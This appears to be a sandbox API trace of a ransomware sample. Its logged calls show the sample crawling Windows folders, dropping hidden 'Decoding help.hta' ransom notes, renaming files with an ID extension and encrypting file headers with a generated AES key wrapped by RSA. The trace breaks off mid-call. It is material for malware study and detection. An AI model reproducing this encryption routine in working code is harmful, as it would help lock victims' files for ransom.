FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0040.538] lstrcmpW (lpString1=".", lpString2="Windows NT") returned -1 [0040.538] lstrcmpW (lpString1="..", lpString2="Windows NT") returned -1 [0040.538] lstrcmpiW (lpString1="windows", lpString2="Windows NT") returned -1 [0040.540] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0040.540] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0040.540] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="Windows NT" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT" [0040.540] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*.*" [0040.541] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0040.541] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11047730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0040.541] CloseHandle (hObject=0x194) returned 1 [0040.542] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 1 [0040.542] lstrcmpW (lpString1=".", lpString2="WwanSvc") returned -1 [0040.542] lstrcmpW (lpString1="..", lpString2="WwanSvc") returned -1 [0040.542] lstrcmpiW (lpString1="windows", lpString2="WwanSvc") returned -1 [0040.544] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\*.*" [0040.544] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\*.*") returned 32 [0040.544] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\", lpString2="WwanSvc" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc" [0040.544] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\WwanSvc\\*.*" [0040.544] GlobalMemoryStatus (in: lpBuffer=0x660fd10 | out: lpBuffer=0x660fd10) [0040.544] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1105f798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x194 [0040.545] CloseHandle (hObject=0x194) returned 1 [0040.545] FindNextFileW (in: hFindFile=0x5a52b0, lpFindFileData=0x660fd30 | out: lpFindFileData=0x660fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 0 [0041.481] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 58 os_tid = 0xb1c [0039.339] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\*.*", lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef0a44f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a54b0 [0039.340] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.340] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef0a44f0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef0a44f0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.340] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.340] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.340] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd68b1180, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd68b1180, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office14", cAlternateFileName="")) returned 1 [0039.340] lstrcmpW (lpString1=".", lpString2="Office14") returned -1 [0039.340] lstrcmpW (lpString1="..", lpString2="Office14") returned -1 [0039.340] lstrcmpiW (lpString1="windows", lpString2="Office14") returned 1 [0039.341] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\*.*" [0039.342] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\*.*") returned 47 [0039.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\", lpString2="Office14" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14" [0039.342] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0039.342] GlobalMemoryStatus (in: lpBuffer=0x674fd10 | out: lpBuffer=0x674fd10) [0039.342] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97f2570, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e8 [0039.357] CloseHandle (hObject=0x1e8) returned 1 [0039.357] FindNextFileW (in: hFindFile=0x5a54b0, lpFindFileData=0x674fd30 | out: lpFindFileData=0x674fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd68b1180, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd68b1180, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office14", cAlternateFileName="")) returned 0 [0039.357] FindClose (in: hFindFile=0x5a54b0 | out: hFindFile=0x5a54b0) returned 1 Thread: id = 59 os_tid = 0xb20 [0039.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\*.*", lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5530 [0039.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.355] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.355] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.355] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADO.NET", cAlternateFileName="")) returned 1 [0039.355] lstrcmpW (lpString1=".", lpString2="ADO.NET") returned -1 [0039.355] lstrcmpW (lpString1="..", lpString2="ADO.NET") returned -1 [0039.355] lstrcmpiW (lpString1="windows", lpString2="ADO.NET") returned 1 [0039.356] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\*.*" [0039.356] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\*.*") returned 59 [0039.356] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\", lpString2="ADO.NET" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET" [0039.357] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Synchronization Services\\ADO.NET\\*.*" [0039.357] GlobalMemoryStatus (in: lpBuffer=0x688fd10 | out: lpBuffer=0x688fd10) [0039.357] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x986a778, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x128 [0039.374] CloseHandle (hObject=0x128) returned 1 [0039.374] FindNextFileW (in: hFindFile=0x5a5530, lpFindFileData=0x688fd30 | out: lpFindFileData=0x688fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ADO.NET", cAlternateFileName="")) returned 0 [0039.374] FindClose (in: hFindFile=0x5a5530 | out: hFindFile=0x5a5530) returned 1 Thread: id = 60 os_tid = 0xb24 [0039.551] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*.*", lpFindFileData=0x69cfd30 | out: lpFindFileData=0x69cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a55f0 [0039.551] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.551] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x69cfd30 | out: lpFindFileData=0x69cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.551] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.551] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.551] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x69cfd30 | out: lpFindFileData=0x69cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.551] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\hu-HU\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\*.*") returned="\\\\?\\C:\\Boot\\hu-HU\\*.*" [0039.551] lstrlenW (lpString="\\\\?\\C:\\Boot\\hu-HU\\*.*") returned 21 [0039.552] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\hu-HU\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\hu-HU\\Decoding help.hta" [0039.552] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\Decoding help.hta" (normalized: "c:\\boot\\hu-hu\\decoding help.hta")) returned 0xffffffff [0039.552] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\Decoding help.hta" (normalized: "c:\\boot\\hu-hu\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0039.552] WriteFile (in: hFile=0x210, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x69cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x69cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.553] CloseHandle (hObject=0x210) returned 1 [0039.553] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\hu-HU\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.553] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.553] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.553] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\hu-HU\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\*.*") returned="\\\\?\\C:\\Boot\\hu-HU\\*.*" [0039.553] lstrlenW (lpString="\\\\?\\C:\\Boot\\hu-HU\\*.*") returned 21 [0039.553] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\hu-HU\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" [0039.553] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" [0039.553] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.554] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\hu-HU\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.554] FindNextFileW (in: hFindFile=0x5a55f0, lpFindFileData=0x69cfd30 | out: lpFindFileData=0x69cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.554] FindClose (in: hFindFile=0x5a55f0 | out: hFindFile=0x5a55f0) returned 1 Thread: id = 61 os_tid = 0xb28 [0039.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default User\\*.*", lpFindFileData=0x6b0fd30 | out: lpFindFileData=0x6b0fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 62 os_tid = 0xb2c [0039.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*", lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a54f0 [0039.414] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.414] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.430] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.430] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.430] FindNextFileW (in: hFindFile=0x5a54f0, lpFindFileData=0x6c4fd30 | out: lpFindFileData=0x6c4fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x896b9210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x896b9210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hx.hxn", cAlternateFileName="")) returned 1 [0039.430] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0039.430] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0039.430] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" [0039.430] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta")) returned 0xffffffff [0039.430] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft help\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0039.431] WriteFile (in: hFile=0x1e8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x6c4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.432] CloseHandle (hObject=0x1e8) returned 1 [0039.432] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.432] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Hx.hxn") returned -1 [0039.432] lstrlenW (lpString="Hx.hxn") returned 6 [0039.432] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*" [0039.432] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\*.*") returned 37 [0039.432] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\", lpString2="Hx.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" [0039.432] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" [0039.432] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0039.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn" (normalized: "c:\\programdata\\microsoft help\\hx.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\hx.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.433] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\Hx.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft help\\hx.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e8 [0039.433] CreateFileMappingA (hFile=0x1e8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0039.433] CryptAcquireContextA (in: phProv=0x6c4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6c4fcec*=0x5b0220) returned 1 [0039.434] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0x6c4fce8 | out: phKey=0x6c4fce8*=0x5a54b0) returned 1 [0039.434] CryptExportKey (in: hKey=0x5a54b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x6c4fbe4, pdwDataLen=0x6c4fce4 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fce4*=0x2c) returned 1 [0039.434] MapViewOfFile (hFileMappingObject=0x134, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x180) returned 0x2d0000 [0039.435] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x6c4fbe4*, pdwDataLen=0x6c4fcf8*=0x100) returned 1 [0039.436] CryptEncrypt (in: hKey=0x5a54b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0x6c4fce4*=0x180, dwBufLen=0x180 | out: pbData=0x2d0000*, pdwDataLen=0x6c4fce4*=0x180) returned 1 [0039.436] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0039.436] CloseHandle (hObject=0x134) returned 1 [0039.436] CryptDestroyKey (hKey=0x5a54b0) returned 1 [0039.436] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.436] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.436] WriteFile (in: hFile=0x1e8, lpBuffer=0x6c4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x6c4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x6c4fbe4*, lpNumberOfBytesWritten=0x6c4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.437] WriteFile (in: hFile=0x1e8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x6c4fcf8, 